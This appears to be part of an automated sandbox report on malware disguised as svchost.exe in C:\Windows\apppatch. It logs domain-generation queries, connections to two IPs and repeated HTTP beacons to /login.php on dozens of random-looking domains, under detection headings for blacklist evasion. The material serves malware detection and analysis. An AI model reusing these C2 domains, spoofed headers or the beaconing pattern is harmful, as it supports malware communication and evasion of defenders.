    Source: C:\Windows\apppatch\svchost.exeDomain query: gaqyqez.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.203.226 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: lysyvud.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: lymymud.com
    Queries Google from non browser process on port 80
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww1.lysyfyj.com Connection: Keep-Alive Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1725778797.6242731
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1725778797.8172407
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1725778797.6242731
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1725778797.8172407
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1725778797.6242731
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1725778797.8172407
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
    Queries random domain names (often used to prevent blacklisting and sinkholes)
    Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
    Tries to resolve many domain names, but no domain seems valid
    Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyrug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
